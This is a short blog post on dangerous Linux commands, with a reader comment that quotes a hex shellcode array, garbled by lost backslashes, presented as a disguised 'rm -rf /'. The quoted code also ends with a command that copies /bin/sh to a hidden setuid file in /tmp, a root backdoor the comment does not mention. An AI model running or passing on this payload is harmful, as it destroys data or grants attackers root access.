Seven Deadly LINUX Commands

This article reminds me of just one more reason I like command line instructions that say what they mean. And no, I’m not saying that Windows is much (if any) better. This is why I miss my DCL. 🙁

Of course that article is another reason not to run at elevated privileges on any operating system.

One Response to “Seven Deadly LINUX Commands”

  1. Matt says:

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
    “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
    “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
    “x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
    “x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
    “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
    “x6ex2fx73x68x00x2dx63x00”
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

    Except that “even the rather experienced Linux users” would probably be smart enough to not run a lengthy string of hex that they found on the Internet as a command?

    None of those commands scare me much. The only one, really, is the first one, but experienced users tend to pause before running an “rm -rf,” much less one with wildcards.

    This reminds me of something I decided the other day, though: Linux can be tough to maintain, but it will always do what you tell it to. When the problems pop up, it’s usually either because you screwed something up, or because of hardware failure. A system that’s been running won’t one day stop working. Windows, by comparison, is easy to use, but can be pretty unpredictable.

    Case in point, we had someone breach someone’s account at work. With Linux, the commands were complex, but we were able to see every page they hit, figure out what was going on, and block them. The same user’s Exchange account was disabled later on. We can find no way of figuring out what happened, other than to guess. (We assume someone tried to brute-force the password and Exchange locked the account. There are no logs to confirm this, though.)

Leave a Reply